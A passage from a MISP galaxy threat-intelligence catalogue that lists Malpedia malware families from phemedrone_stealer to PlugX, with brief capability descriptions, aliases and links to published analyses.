phemedrone_stealer

The tag is: misp-galaxy:malpedia="phemedrone_stealer"

phemedrone_stealer is also known as:

Table 4245. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phemedrone_stealer

https://github.com/nullixx/Phemedrone-Stealer/blob/master/README.md

Phobos

MalwareBytes states that Phobos is one of the ransomware families that are distributed via hacked Remote Desktop (RDP) connections. This isn’t surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost efficient dissemination vector for threat groups.

The tag is: misp-galaxy:malpedia="Phobos"

Phobos is also known as:

Table 4247. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos

https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew

https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground

https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware

https://securelist.com/cis-ransomware/104452/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/

https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware

https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/

https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html

https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://blogs.blackberry.com/en/2021/11/zebra2104

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/

https://cert.pl/en/posts/2023/02/breaking-phobos/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://twitter.com/rivitna2/status/1674718854549831681

https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/

Phonk

The tag is: misp-galaxy:malpedia="Phonk"

Phonk is also known as:

Table 4250. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phonk

https://twitter.com/abuse_ch/status/1630111198036348928

PHOREAL

Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53.

The tag is: misp-galaxy:malpedia="PHOREAL"

PHOREAL is also known as:

  • Rizzo

Table 4251. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf

https://elastic.github.io/security-research/intelligence/2022/03/02.phoreal-targets-southeast-asia-financial-sector/article/

https://www.secureworks.com/research/threat-profiles/tin-woodlawn

Phorpiex

Proofpoint describes Phorpiex/Trik as an SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.

The tag is: misp-galaxy:malpedia="Phorpiex"

Phorpiex is also known as:

  • Trik

  • phorphiex

Table 4252. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows

https://twitter.com/CPResearch/status/1447852018794643457

https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/

https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/

https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/

https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html

https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/

https://www.johannesbader.ch/2016/02/phorpiex/

https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet

https://research.checkpoint.com/2019/phorpiex-breakdown/

https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/

https://bin.re/blog/phorpiex/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/

PHOTOFORK

PHOTOFORK is a downloader which is a modified version of GZIPLOADER. It was first detected in February 2023 and was distributed by TA581 along with an unattributed threat activity cluster that facilitated initial access. In this version, the configuration file is no longer encrypted using a simple XOR algorithm with a 64-byte key. Instead, it uses a custom algorithm previously used by the Standard core loader. This algorithm decrypts DLL strings that are needed to resolve handles to the necessary DLLs later on. The strings are decrypted using an algorithm that splits the data into DWORDs and XORs it against a random key. The main objective of PHOTOFORK remains the same as GZIPLOADER, i.e. to deliver an encrypted bot and core DLL loader (forked) that loads the Forked ICEDID bot into memory using a custom PE format.

The tag is: misp-galaxy:malpedia="PHOTOFORK"

PHOTOFORK is also known as:

Table 4253. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork

https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid

PHOTOLITE

PHOTOLITE is the lite version of GZIPLOADER with limited capabilities; for example, it does not have any functionality to exfiltrate host information. This new variant was observed as a follow-on payload in a TA542 Emotet campaign in November 2022. It contains a static URL to download a "Bot Pack" file with a static name (botpack.dat), which results in the IcedID Lite DLL Loader and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud.

The tag is: misp-galaxy:malpedia="PHOTOLITE"

PHOTOLITE is also known as:

Table 4254. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite

https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid

https://www.intrinsec.com/emotet-returns-and-deploys-loaders/

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return

PhotoLoader

A loader used to deliver IcedID, fetching a fake image from which payloads are extracted.

The tag is: misp-galaxy:malpedia="PhotoLoader"

PhotoLoader is also known as:

  • GZIPLOADER

Table 4255. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader

https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid

https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns

https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/

https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns

https://isc.sans.edu/diary/29740

https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/

https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary

https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://blog.talosintelligence.com/following-the-lnk-metadata-trail

https://isc.sans.edu/diary/28636

https://www.youtube.com/watch?v=4j8t9kFLFIY

https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid

https://www.silentpush.com/blog/icedid-command-and-control-infrastructure

https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://leandrofroes.github.io/posts/Reversing-a-recent-IcedID-Crypter/

https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/

https://www.silentpush.com/blog/malicious-infrastructure-as-a-service

https://twitter.com/felixw3000/status/1521816045769662468

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1

https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/

https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf

https://www.elastic.co/security-labs/unpacking-icedid

https://www.team-cymru.com/post/from-chile-with-malware

https://research.openanalysis.net/icedid/bokbot/photoloader/config/2023/04/06/photoloader.html

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://sysopfb.github.io/malware,/icedid/2020/04/28/IcedIDs-updated-photoloader.html

https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes

PICKPOCKET

PICKPOCKET is a credential theft tool that dumps the user’s website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed solely utilized by APT34.

The tag is: misp-galaxy:malpedia="PICKPOCKET"

PICKPOCKET is also known as:

Table 4256. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket

https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae

PIEHOP

According to Mandiant, PIEHOP is a disruption tool written in Python and packaged with PyInstaller version 2.1+ that has the capability to connect to a user-supplied remote MSSQL server for uploading files and issuing remote commands to an RTU. PIEHOP expects its main function to be called via another Python file, supplying either the argument control=True or upload=True. At a minimum, it requires the following arguments: oik, user, and pwd, and if called with control=True, it must also be supplied with iec104.

The tag is: misp-galaxy:malpedia="PIEHOP"

PIEHOP is also known as:

Table 4257. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.piehop

https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response

Pikabot

Introducing Pikabot, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. Despite being in the early stages of development, it already demonstrates advanced techniques in evasion, injection, and anti-analysis. Notably, the loader component incorporates an array of sophisticated anti-debugging and anti-VM measures inspired by the open-source Al-Khaser project, while leveraging steganography to conceal its payload. Additionally, Pikabot utilizes a proprietary C2 framework and supports a diverse range of commands, encompassing host enumeration and advanced secondary payload injection options.

The tag is: misp-galaxy:malpedia="Pikabot"

Pikabot is also known as:

Table 4259. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot

https://research.openanalysis.net/pikabot/yara/config/loader/2023/02/26/pikabot.html

https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads

https://d01a.github.io/pikabot/

https://blog.securityonion.net/2023/09/quick-malware-analysis-pikabot.html

https://www.malware-traffic-analysis.net/2023/10/03/index.html

https://research.openanalysis.net/pikabot/debugging/string%20decryption/emulation/memulator/2023/11/19/new-pikabot-strings.html

https://kienmanowar.wordpress.com/2024/01/06/quicknote-technical-analysis-of-recent-pikabot-core-module/

https://www.hivepro.com/wp-content/uploads/2023/05/Pikabot-A-Stealthy-Backdoor-with-Ingenious-Evasion-Tactics_TA2023246.pdf

https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398

https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot

https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/

https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html

https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/

https://github.com/VenzoV/MalwareAnalysisReports/blob/main/Pikabot/Pikabot%20Loader.md

PILLOWMINT

According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory. Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged). It contains additional backdoor capabilities, including:

  • Running processes

  • Downloading and executing files (T1105: Remote File Copy)

  • Downloading and injecting DLLs (T1055: Process Injection)

It communicates with a command and control (C2) server over HTTP using AES-encrypted messages (T1071: Standard Application Layer Protocol) (T1032: Standard Cryptographic Protocol).

The tag is: misp-galaxy:malpedia="PILLOWMINT"

PILLOWMINT is also known as:

Table 4260. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/

PinchDuke

According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host, transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has since been openly distributed on underground forums.

The tag is: misp-galaxy:malpedia="PinchDuke"

PinchDuke is also known as:

Table 4261. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke

https://blog.f-secure.com/wp-content/uploads/2020/03/F-Secure_Dukes_Whitepaper.pdf

pipcreat

The tag is: misp-galaxy:malpedia="pipcreat"

pipcreat is also known as:

Table 4263. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat

https://www.snort.org/rule_docs/1-26941

PipeSnoop

Cisco Talos states that PipeSnoop can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint.

The tag is: misp-galaxy:malpedia="PipeSnoop"

PipeSnoop is also known as:

Table 4265. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pipesnoop

https://blog.talosintelligence.com/introducing-shrouded-snooper/

Pkybot

Pkybot is a trojan which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added, according to Kleissner/Kafeine/iSight, using the infamous ATS.

The tag is: misp-galaxy:malpedia="Pkybot"

Pkybot is also known as:

  • Bublik

  • Pykbot

  • TBag

Table 4270. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot

http://blog.kleissner.org/?p=788

http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot

PLAY

According to PCrisk, PLAY is the name of a ransomware-type program. Malware categorized as such operates by encrypting data and demanding ransoms for the decryption.

After we executed a sample of this ransomware on our test machine, it encrypted files and appended their filenames with a ".PLAY" extension. For example, a file titled "1.jpg" appeared as "1.jpg.PLAY", "2.png" as "2.png.PLAY", etc. Once the encryption process was completed, PLAY created a text file named "ReadMe.txt" on the desktop.

The tag is: misp-galaxy:malpedia="PLAY"

PLAY is also known as:

  • PlayCrypt

Table 4272. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.play

https://adlumin.com/post/playcrypt-ransomware-as-a-service-expands-threat-from-script-kiddies-and-sophisticated-attackers/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.avertium.com/resources/threat-reports/an-in-depth-look-at-play-ransomware

https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware

https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/

https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/

https://www.orangecyberdefense.com/global/blog/playing-the-game

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy

playwork

The tag is: misp-galaxy:malpedia="playwork"

playwork is also known as:

Table 4273. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork

https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html

PLEAD (Windows)

PLEAD is a RAT used by the actor BlackTech. FireEye uses the synonyms GOODTIMES for the RAT module and DRAWDOWN for the respective downloader.

The tag is: misp-galaxy:malpedia="PLEAD (Windows)"

PLEAD (Windows) is also known as:

  • DRAWDOWN

  • GOODTIMES

  • Linopid

Table 4274. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.plead

https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf

https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html

http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html

https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html

https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html

http://www.freebuf.com/column/159865.html

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html

https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt

https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html

https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html

https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf

https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf

https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/

https://securelist.com/apt-trends-report-q2-2019/91897/

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

PlugX

RSA describes PlugX as a RAT (Remote Access Trojan) malware family that has been around since 2008 and is used as a backdoor to fully control the victim’s machine. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.

Notable features of this malware family are the ability to execute commands on the affected machine to:

  • retrieve machine information

  • capture the screen

  • send keyboard and mouse events

  • perform keylogging

  • reboot the system

  • manage processes (create, kill and enumerate)

  • manage services (create, start, stop, etc.)

  • manage Windows registry entries

  • open a shell, etc.

The malware also logs its events in a text log file.

The tag is: misp-galaxy:malpedia="PlugX"

PlugX is also known as:

  • Destroy RAT

  • Kaba

  • Korplug

  • RedDelta

  • Sogu

  • TIGERPLUG

Table 4277. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx

https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf

https://www.anomali.com/blog/covid-19-themes-are-being-utilized-by-threat-actors-of-varying-sophistication

https://www.us-cert.gov/ncas/alerts/TA17-117A

https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf

https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf

https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf

https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/

https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf

https://www.contextis.com/de/blog/avivore

https://www.macnica.net/file/security_report_20160613.pdf

https://www.secureworks.com/research/threat-profiles/bronze-express

https://blog.polyswarm.io/carderbee-targets-hong-kong-in-supply-chain-attack

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

https://attack.mitre.org/groups/G0001/

https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers

https://www.youtube.com/watch?v=E2_DTQJjDYc

http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html

https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/

https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/

https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt

https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/

https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/

https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf

https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/

https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf

https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://blog.xorhex.com/blog/mustangpandaplugx-2/

https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html

https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/

https://www.youtube.com/watch?v=6SDdUVejR2w

https://www.secureworks.com/research/threat-profiles/bronze-overbrook

https://www.secureworks.com/research/threat-profiles/bronze-olive

https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn

https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse

https://blog.xorhex.com/blog/reddeltaplugxchangeup/

https://securelist.com/cycldek-bridging-the-air-gap/97157/

https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/

https://www.splunk.com/en_us/blog/security/unmasking-the-enigma-a-historical-dive-into-the-world-of-plugx-malware.html

https://blog.ensilo.com/uncovering-new-activity-by-apt10

https://www.secureworks.com/research/bronze-president-targets-ngos

https://www.secureworks.com/research/threat-profiles/bronze-riverside

https://attack.mitre.org/groups/G0096

https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/

https://www.contextis.com/en/blog/avivore

http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html

https://www.recordedfuture.com/china-linked-ta428-threat-group

https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/

https://engineers.ffri.jp/entry/2022/11/30/141346

https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/

https://unit42.paloaltonetworks.com/thor-plugx-variant/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/

http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html

https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/

https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report

https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf

https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx

https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf

https://unit42.paloaltonetworks.com/unsigned-dlls/

https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/

https://asec.ahnlab.com/en/49097/

https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/

https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf

https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-

https://securelist.com/time-of-death-connected-medicine/84315/

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html

https://community.rsa.com/thread/185439

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://www.secureworks.com/research/threat-profiles/bronze-woodland

https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/

https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/

https://raw.githubusercontent.com/m4now4r/Presentations/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf

https://web.archive.org/web/20200424035112/https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf

https://twitter.com/stvemillertime/status/1261263000960450562

https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html

https://www.secureworks.com/blog/bronze-president-targets-government-officials

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://web.archive.org/web/20191214125833/https://contextis.com/media/downloads/AVIVORE_An_overview.pdf

https://www.secureworks.com/research/threat-profiles/bronze-president

https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf

https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/

https://www.youtube.com/watch?v=IRh6R8o1Q7U

https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/

https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/

https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf

